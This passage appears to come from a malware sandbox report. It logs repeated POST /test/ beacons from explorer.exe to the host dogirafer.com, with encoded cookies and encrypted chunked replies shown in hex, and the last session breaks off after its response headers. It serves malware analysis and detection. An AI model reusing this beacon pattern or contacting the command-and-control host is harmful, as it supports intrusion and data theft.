                                                                  Cookie: aXLYGobmm+hlagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:44 UTC799INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:44 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkeejO%2FlYRiM1ZYZoo%2FVhtVj5i3z2hIN515H%2BYPbInWXJzh08B%2BMnIYgcsN%2B7W2kd9oBPqu18ZPeoANhOsBkS%2BZOL%2FFz4qqLmzsivWoJ9oKod57adti%2BFi2h%2F%2ByowM%2Bq"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2351fd8c5e67-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1706&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1052&delivery_rate=1676234&cwnd=242&unsent_bytes=0&cid=693ae9fa1a78aedf&ts=1611&x=0"
                                                                  2024-12-02 17:46:44 UTC347INData Raw: 31 35 34 0d 0a 4f 53 32 59 51 63 4b 33 32 49 70 75 59 42 33 65 6a 57 2f 6c 67 33 56 4a 4d 6b 4c 58 42 53 50 43 5a 2f 71 36 76 69 66 46 5a 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 4a 6b 38 6f 66 5a 4c 6a 37 46 30 6c 41 62 61 36 73 4b 64 47 73 5a 61 72 6f 73 34 38 36 55 35 58 47 32 74 4d 37 63 47 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 45 7a 42 65 4c 6b 49 52 78 2b 61 4c 44 44 65 58 49 71 35 73 74 4f 36 6c 66 63 41 52 78 4f 37 45 30 2b 4d 46 4d 49 4f 59 76 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 58 52 35
                                                                  Data Ascii: 154OS2YQcK32IpuYB3ejW/lg3VJMkLXBSPCZ/q6vifFZWmcphSGpB6yiJiVjA1nJk8ofZLj7F0lAba6sKdGsZaros486U5XG2tM7cGnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcEzBeLkIRx+aLDDeXIq5stO6lfcARxO7E0+MFMIOYvMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1XR5
                                                                  2024-12-02 17:46:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  44192.168.2.550033104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:45 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:47 UTC779INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSiYWGiFWhMOV6M3eMbVa0pmJV8xEODq5tgFZoliNhhDnvdENMjH6oBJEI3EwZ2I3FK1tqDLXRyQvqwLs2MQ2dEfk1jNK6tqIniSXl1enP9y3i3j6rKarATyY6UpXl%2FS"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23646ec7c443-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1539&rtt_var=636&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=1897335&cwnd=241&unsent_bytes=0&cid=9a78b244faaeb510&ts=1622&x=0"
                                                                  2024-12-02 17:46:47 UTC343INData Raw: 31 35 30 0d 0a 50 69 6d 65 52 73 4b 79 32 49 70 6c 5a 52 58 61 68 32 4f 73 79 33 4a 4e 50 55 76 55 44 55 36 73 61 50 36 33 74 69 58 50 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 70 4a 30 45 6f 66 35 61 4f 68 56 77 6a 43 37 61 36 74 65 30 44 73 70 4b 74 6f 4d 6f 39 67 69 52 54 46 57 70 4d 35 38 62 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 73 34 79 41 75 33 6c 4a 6e 4d 5a 62 37 50 46 66 6e 63 72 71 34 4e 41 37 46 50 5a 44 78 41 70 67 45 6f 36 4e 56 38 4d 50 4d 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 35 57 52 5a
                                                                  Data Ascii: 150PimeRsKy2IplZRXah2Osy3JNPUvUDU6saP63tiXPKRib7xuPoA21j4bUizRpJ0Eof5aOhVwjC7a6te0DspKtoMo9giRTFWpM58bsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Es4yAu3lJnMZb7PFfncrq4NA7FPZDxApgEo6NV8MPMC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf5WRZ
                                                                  2024-12-02 17:46:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  45192.168.2.550034104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:48 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:50 UTC781INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=heyWE44VIX7FXhSSLnaw013XgzPiOVY7GFF2cIFfImTSF1roGcqvbDzbmMPfrBVVuEB7BVe20M%2FgJQ6Ve3F6hna744aM7RE8m1SivvrqUCrUmMJpbxT7S0%2FevLCPJajL"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd237679c77c9f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1851&min_rtt=1835&rtt_var=700&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=1591280&cwnd=213&unsent_bytes=0&cid=6392fa63b2e1eabc&ts=1586&x=0"
                                                                  2024-12-02 17:46:50 UTC339INData Raw: 31 34 63 0d 0a 50 69 32 64 54 4d 47 33 30 59 70 69 5a 78 6a 52 67 6d 2f 6c 67 33 4e 48 50 6b 37 55 41 69 54 43 5a 2f 69 78 75 69 62 4e 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 74 4a 30 55 76 65 70 48 70 37 46 63 68 44 4c 65 2f 74 4b 6c 47 74 4a 57 71 72 63 30 2b 67 69 52 52 47 47 5a 4f 36 59 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4b 46 38 41 78 42 75 6e 6a 54 68 51 55 5a 4c 58 47 65 6a 30 73 35 49 4e 48 36 56 76 66 5a 78 46 45 67 55 73 38 4d 56 78 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 6d 50 76 56 52 54 70
                                                                  Data Ascii: 14cPi2dTMG30YpiZxjRgm/lg3NHPk7UAiTCZ/ixuibNZGmcphSGpB6yiJiVjA1tJ0UvepHp7FchDLe/tKlGtJWqrc0+giRRGGZO6Y+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzKF8AxBunjThQUZLXGej0s5INH6VvfZxFEgUs8MVxEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbmPvVRTp
                                                                  2024-12-02 17:46:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  46192.168.2.550035104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:51 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:53 UTC790INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdJb9sdgogknPXgn9RFARrhW9ZsLvJyrteszeZ04yogeVyBsll8eTU6L3Dh%2FqyS4YVwJFiNU%2BjopnvEEygpqxE%2BU%2BbMe%2Bdjj3nCNIi%2BjvcbPydtAZXaVZR21jFpvNNxF"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23898a5baad4-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14428&min_rtt=14425&rtt_var=5417&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=202006&cwnd=32&unsent_bytes=0&cid=39ec9e2138476c09&ts=1747&x=0"
                                                                  2024-12-02 17:46:53 UTC343INData Raw: 31 35 30 0d 0a 50 79 69 55 52 73 71 77 33 59 70 6a 61 68 6a 5a 67 47 62 6d 67 33 35 47 50 6b 2f 52 42 69 6e 43 62 76 79 7a 76 69 2f 4d 59 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 4c 6b 45 70 66 35 54 6e 37 46 6b 67 44 37 61 32 74 4b 56 47 73 4a 43 6e 70 73 67 37 37 45 35 51 47 32 5a 46 36 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 48 46 63 41 35 41 2b 50 6b 54 68 6f 51 61 37 54 48 65 6e 4e 68 34 34 39 41 37 6c 48 5a 43 33 5a 48 67 45 30 2f 4e 46 73 42 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 2f 56 58 51 35
                                                                  Data Ascii: 150PyiURsqw3YpjahjZgGbmg35GPk/RBinCbvyzvi/MYWmcphSGpB6yiJiVjA1sLkEpf5Tn7FkgD7a2tKVGsJCnpsg77E5QG2ZF64+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzHFcA5A+PkThoQa7THenNh449A7lHZC3ZHgE0/NFsBcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZN/VXQ5
                                                                  2024-12-02 17:46:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  47192.168.2.550036104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:54 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:56 UTC786INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WnGEuaNLvNh5b2m4PiNYC84Rl0sGdyZsKkvVZsMehhIYHDF%2Fxlc%2FMQ%2FiQ8Eu8DtlQqgIS8deKQkerk2hM3TUx8jIlt3m5KcfMG4jz4gHpRrRY50%2BdJUJFhG5jCzUSFiJ"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd239c3dddac8a-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13861&min_rtt=13755&rtt_var=5370&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=199931&cwnd=32&unsent_bytes=0&cid=8a9cb9049ad6492a&ts=1594&x=0"
                                                                  2024-12-02 17:46:56 UTC343INData Raw: 31 35 30 0d 0a 4d 69 32 55 52 4d 61 78 32 49 70 6a 59 42 76 61 6a 47 4c 6b 67 33 64 4a 4d 30 2f 51 42 43 4c 43 61 50 69 77 76 43 48 50 59 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 49 30 59 6f 65 35 4c 67 37 46 30 72 43 72 71 2b 74 61 64 47 73 70 65 6e 70 63 77 36 36 55 35 57 46 57 46 4e 36 4d 65 6c 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 78 42 2b 7a 6d 4a 52 56 2b 61 4c 62 49 63 6e 45 6c 34 4d 74 44 36 46 50 63 43 68 70 42 37 45 67 31 4f 56 49 4d 4e 34 76 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 56 51 70
                                                                  Data Ascii: 150Mi2URMax2IpjYBvajGLkg3dJM0/QBCLCaPiwvCHPYWmcphSGpB6yiJiVjA1qI0Yoe5Lg7F0rCrq+tadGspenpcw66U5WFWFN6MelfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcwxB+zmJRV+aLbIcnEl4MtD6FPcChpB7Eg1OVIMN4vMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1VQp
                                                                  2024-12-02 17:46:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  48192.168.2.550037104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:57 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:59 UTC788INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50wPhqxmKR9qvV6qgiUFTe8VwOy75lY0bENk2a2LlUNEllUlSX0Cim%2Be6LA3pubwA9Yye1%2F4u16Qd1EDjP3%2BHn8rge5D%2B1hQ4pukEv%2BcYtkUSBmtLELXPf0zCDnuk6Qg"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23b07d09abd9-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14899&min_rtt=14122&rtt_var=6851&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=143531&cwnd=32&unsent_bytes=0&cid=dd16ef24bb485cfc&ts=1417&x=0"
                                                                  2024-12-02 17:46:59 UTC343INData Raw: 31 35 30 0d 0a 4d 69 57 56 51 38 71 36 32 34 70 6a 5a 78 2f 51 67 47 61 73 7a 58 35 4d 4f 30 72 66 41 55 36 75 61 76 71 30 74 79 58 4b 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 52 74 4c 30 51 6a 66 4a 71 4f 67 46 59 68 43 37 53 38 73 65 30 43 74 35 75 75 6f 38 45 38 67 69 42 54 47 6d 4a 4e 37 38 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 73 6f 35 41 65 76 6d 4b 58 4d 59 61 4c 44 4a 66 33 4d 76 71 34 56 41 37 46 50 56 44 48 5a 44 68 30 67 30 4d 46 4d 49 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 2f 42 55 54 70
                                                                  Data Ascii: 150MiWVQ8q624pjZx/QgGaszX5MO0rfAU6uavq0tyXKKRib7xuPoA21j4bUizRtL0QjfJqOgFYhC7S8se0Ct5uuo8E8giBTGmJN78HsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Fso5AevmKXMYaLDJf3Mvq4VA7FPVDHZDh0g0MFMIcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZN/BUTp
                                                                  2024-12-02 17:46:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  49192.168.2.550038104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:47:00 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:47:02 UTC786INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:47:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jzKUMyXJGscvwpDkuX%2FZkqjsoIgkEnODoSmjXnjHxkiim2JKjP3X6XZi6i2ARv%2FvLJPnk5BIMyU7fAdRQ1Lows3lHSQAf5dCPSWwJ%2FNJbvafE8IVOLdFg1Apsxfh%2FVk6"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23c2a853ab2d-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14244&min_rtt=14239&rtt_var=5351&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1052&delivery_rate=204395&cwnd=32&unsent_bytes=0&cid=ab2bd386aad0dc16&ts=1627&x=0"
                                                                  2024-12-02 17:47:02 UTC347INData Raw: 31 35 34 0d 0a 50 79 71 5a 54 63 71 78 33 49 70 6e 5a 78 7a 61 67 57 48 67 67 33 52 4e 4d 30 72 55 41 69 50 43 61 50 69 36 76 43 2f 4d 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 4a 45 49 76 66 35 62 6b 37 46 63 6b 43 37 47 38 75 4b 46 47 74 5a 65 76 70 4d 45 36 37 6b 35 53 48 47 42 4b 36 63 4f 68 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6b 32 41 75 50 6a 4b 42 31 2b 5a 4c 58 44 66 33 41 6b 37 38 74 45 37 56 4c 5a 44 52 35 48 37 45 77 39 4d 6c 4d 49 4e 6f 72 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 55 54 35
                                                                  Data Ascii: 154PyqZTcqx3IpnZxzagWHgg3RNM0rUAiPCaPi6vC/MZGmcphSGpB6yiJiVjA1qJEIvf5bk7FckC7G8uKFGtZevpME67k5SHGBK6cOhfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kck2AuPjKB1+ZLXDf3Ak78tE7VLZDR5H7Ew9MlMINorMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1UT5
                                                                  2024-12-02 17:47:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  50192.168.2.550039104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:47:03 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hiZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:47:05 UTC788INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:47:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jhCiFSm5MOMwGXy2LMVUdlwbLcgsapsklv%2Farxfx0oh5b8%2BOB19G63Ja4tZpHk%2BM335%2Blk2iUhBlkBhJdCZkfLGUvrarIS8JiI61IJ2EZjKifM1dhNvHLTfm0C7%2FUDoN"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23d5dc374bcc-BUF
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=12503&min_rtt=12494&rtt_var=4704&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=232262&cwnd=32&unsent_bytes=0&cid=b24ba16fe51b473d&ts=1736&x=0"
